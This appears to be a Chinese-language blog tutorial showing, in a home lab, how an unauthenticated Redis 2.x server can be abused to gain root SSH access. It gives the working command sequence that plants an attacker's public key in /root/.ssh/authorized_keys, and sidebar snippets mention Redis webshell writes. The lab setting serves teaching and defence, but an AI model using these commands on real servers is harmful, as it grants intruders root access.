【网络安全】通过Redis2.x实现ssh未授权访问

最新推荐文章于 2023-09-08 16:41:45 发布
最新推荐文章于 2023-09-08 16:41:45 发布
阅读量2.3k 收藏 4
点赞数
分类专栏: 网络安全 文章标签: web安全 ssh linux redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kinghzking/article/details/126472739
版权

导读

开发环境

版本号描述
操作系统Win11-21H2内部版本号22000.588
kalikali-linux-2022.3-live-amd64.iso
redis-server(目标机器)redis-2.8.17.tar.gzhttps://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?pwd=27qf
redis-cli(攻击机器)Redis-x64-5.0.14.ziphttps://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?pwd=nhx8

准备工作

虚拟机搭建(目标机kali)

下载iso文件:
|
在这里插入图片描述
|
这里选择Live Boot模式的iso,不用安装就可以直接体验kali。
|在这里插入图片描述

虚拟机安装
|
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
修改虚拟机配置
|
在这里插入图片描述

启动虚拟机
在这里插入图片描述

查看并启动ssh服务
systemctl status ssh
systemctl start ssh
在这里插入图片描述

开启root账号

kali默认用户为kali,我们使用root账号进行实验,所以需要设置root账号的密码(这里随便设置个密码就行)。

执行命令sudo passwd root

在这里插入图片描述

生成公钥和私钥(攻击机win11)

windows自带了ssh应用,如下图:
在这里插入图片描述

通过ssh-keygen命令生成公钥私钥
在这里插入图片描述

手动实现ssh免密登录

将公钥拷贝到目标机器(kali)

  • 在win11上拷贝一份公钥,名称命名为authorized_keys
    在这里插入图片描述

  • 管理员权限创建目录/root/.ssh
    在这里插入图片描述

  • 以root权限打开资源管理器
    在这里插入图片描述

  • 通过右键菜单拷贝文件到目录/root/.ssh在这里插入图片描述

攻击机(win11)上连接目标机(kali)

  • 查看目标机器ip
    在这里插入图片描述

  • 连接目标机:ssh -i C:/Users/Administrator/.ssh/id_rsa root@192.168.128.129
    在这里插入图片描述

攻击原理分析

从上一步中(手动实现ssh免密登录),我们可以看出来,我们只需要将公钥id_rsa.pub重命名为authorized_keys,然后拷贝到目标机器/root/.ssh目录下就可以实现未授权访问Redis了。
redis刚好能满足我们的需求,2.x版本的redis,默认配置,能被外网访问,并完成上面的操作,我们正是利用这个特性,完成ssh未授权访问

攻击机(win11)上连接目标机(kali)

攻击实战

删除文件authorized_keys,准备模拟攻击

  • 删除文件authorized_keys,再次连接目标机,如下所示(要求输入密码才能登录):

在这里插入图片描述

目标机器的redis-server安装和配置

下载redis-server(目标机器,kali):https://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?pwd=27qf

redis-2.8.17.tar.gz拷贝到/root目录下。

解压并安装redis-server在这里插入图片描述

mkdir /usr/local/redis
tar -zxvf redis-2.8.17.tar.gz
cd redis-2.8.17
make PREFIX=/usr/local/redis install

运行redis-server
在这里插入图片描述

/usr/local/redis/bin/redis-server  redis.conf

攻击机器redis-cli安装和配置

下载redis-cli(攻击机器,win11):https://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?pwd=nhx8

解压Redis-x64-5.0.14.zip,redis-cli连接目标机器:
在这里插入图片描述

通过redis-cli,在目标机器中写入配置文件:

# 将公钥保存到内存中,添加回车换行符`\n`到公钥的前后。
set key "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/SQUPXaHJ7m2PANHUGcvIZ5wdEjy6wuEeQI2etYIeod3iE6udtxQtbOR1H3BsS9pozAX974w2+QLT1DrjF7V6zX8YEFHHG1JDhIyyNwf7OSstkcjSnlf8kmpQrGOwKkW78/yFRgoPOSfH2sONc0Ac2VzGEJFdU4tAYQMNUbpt+GhKezJjo+VG3wkhXlOXvgjqcyKN2Y9WuQ16bvrMrddQMzWoTzksxKBtoC/2ccLw6S9drnr/3xkKYUh8gzvcn2H/HR3hkA5rVZsfP/DrxuCN9jTVbjLmkTkXkrZN1qgQJX4rlQUjZM+/vu/c9dhNQ8iQAk69BjwqYDo2sO/UG7HYW/ao+l7FrvqbA0vNd56G6PJ6HH5rlIYV3awWGg8JtSMTbGmP91QfaN9pZ7AYyd+GSSnspbAjI2xRBnjxANJkEKBkLlvzieOzXwHhn76zJYpJFEvJcRYLJiv2a8SBBapO1tOfAIozGjQhV7ywREvssAkb8ggWWtloUutYjV61uzU= administrator@PC-202204131244\n\n"
# 设置备份目录
config set dir /root/.ssh/
# 设置备份文件名
config set dbfilename "authorized_keys"
# 备份文件
save

测试:ssh免密登录到靶机

  • 连接目标机:ssh -i C:/Users/Administrator/.ssh/id_rsa root@192.168.128.129
    在这里插入图片描述

参考资料

夜猫逐梦
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3023
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
Xshell工具利用Redis 6379写入SSH公钥漏洞
最新发布
maple_leaf
05-03 367
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
Redis webshell详解
m0_54313550的博客
04-19 460
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
NFS挂载提权
m0_71300782的博客
09-08 284
2.点击你登录靶场虚拟机的用户名文件新建yige.ssh文件把公钥复制到这里面(.ssh是隐藏文件把它显示出来)authorized_keys(记得不要后缀)二、然后使用WinScp连接工具连接提权靶场。一、首先在kali的桌面创建公钥、私钥。发现在桌面创建了俩个文件夹,就是公私钥。ssh bob@提权靶场的ip地址。三、再回到kali在控制面板输入。1.在桌面打开控制面板shur。3.把公钥复制进去把文件名改成。1.使用WinScp连接。2.把公私钥复制到桌面。
SSH免密登录以及没有.ssh目录如何办
m0_38088134的博客
09-04 8506
然后敲(三个回车),就会生成两个文件id_rsa(私钥)、id_rsa.pub(公钥)如果登录后,发现没有.ssh文件夹,执行命令,点击yes。可以生成.ssh 文件夹。
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis6.x视频教程下载
08-01
Redis 6.x 是一个高性能、开源的键值存储系统,被广泛用于数据库、缓存和消息中间件等场景。这个视频教程将深入介绍 Redis 6.x 的新特性、核心概念以及实际应用。以下是对 Redis 6.x 的一些关键知识点的详细讲解: ...
redis 5.X版本,redis 5.X版本
03-29
通过编写模块,可以实现自定义的数据类型、命令、持久化方式等。例如,RediSearch 是一个流行模块,提供了全文搜索功能。 4. **改善的 RDB 快照**: RDB 是 Redis 提供的一种持久化方式,5.0 版本优化了 RDB 文件...
Redis3.x和Redis4.x的Windows版.zip
06-16
在Windows环境下安装Redis,通常需要下载预编译的二进制文件,解压后配置`redis.conf`文件,根据需求设置端口、日志级别、持久化方式等参数。启动服务可以使用`redis-server.exe`命令。同时,Windows版Redis提供了`...
利用Redis写文件权限进行ssh提权登陆linux的漏洞
Vince的专栏
09-30 1296
原理 利用redis的config命令修改rdb文件地址为ssh密钥文件,向redis中写入公共密钥,通过save命令手动刷新到rdb中,此时就可以用私钥登陆了 操作 在本地电脑中(linux为例)生成无密码的密钥 ssh-keygen -t rsa -P '' # 后面直接回车 此时在~/.ssh/下生成两个文件id_rsa和id_rsa.pub,id_rsa是私钥,id_rsa_pub...
Redis-desktop redis管理工具 支持SSH 各种系统
11-26
redis可视化工具,亲测可用,整理了一些各个系统的安装包,支持ssh远程连接
Redis-desktop redis管理工具 支持SSH 无bug版
12-12
Redis-desktop redis管理工具 支持SSH,SSL,Advanced sessting 无bug版
SSH2中配置Redis缓存
11-06
Redis是基于内存,也可以基于磁盘持久化nosql数据库Redis 官网推荐给java 使用的客户端很多:Jedis、Redisson、JRedis、JDBC-Redis 等,当然首推是jedis。
redis-desktop-manager 2020.2.0.0 不支持SSH
08-18
不支持ssh redis client 可视化工具 好用 好用 好用
Redis Desktop Manager 利用ssh连接 Redis
weixin_30415113的博客
03-22 5131
需开启6379端口,如果不设置密码,就忽略1,2步骤 第一步: 第二步: 第三步: 第四步: 第五步: 转载于:https://www.cnblogs.com/-mrl/p/8624105.html...
Redis远程连接
热门推荐
漫天雪_昆仑巅
07-10 6万+
1.1     远程连接 1)  默认无权限控制: 远程服务连接: $ redis-cli -h 127.0.0.1 -p 6379 远程服务停止: $ redis-cli -h 172.168.10.254 -p6379 shutdown   2) 有权限控制时(加上-a 密码): redis-cli -h 127.0.0.1 -p 6379 -a 123456   除了在登
redis远程连接与密码验证
baidu_36030459的博客
02-16 2万+
redis开启远程访问 redis默认只允许本地访问,要使redis可以远程访问可以修改redis.conf   打开redis.conf文件在NETWORK部分有说明 解决办法:注释掉bind 127.0.0.1可以使所有的ip访问redis 若是想指定多个ip访问,但并不是全部的ip访问,可以bind 注意 下面还有个说明 在redis3.2之后,redis
redis mysql主从分离_mysql如何设置主从(读写分离),redis发布功能,以及redis的持久化存储(rdb,aof)...
weixin_27298377的博客
01-19 157
1 mysql基本命令1.启动mysqlsystemctl start mariadb2.linux客户端连接自己mysql -uroot -p -h 127.0.0.13.远程链接mysql服务端mysql -uroot -p -h 192.168.1.197远程授权:grant all privileges on *.* to root@"192.168.1.100" identified b...
redis3.x和redis 6.x版本区别
07-28
2. 内存分配器:Redis 3.x 使用了 jemalloc 作为默认的内存分配器,而 Redis 6.x 则改为使用了更现代化的 TCMalloc。 3. RDB 文件格式:Redis 3.x 使用 RDB 文件格式来进行持久化,而 Redis 6.x 引入了新的 RDB ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜猫逐梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值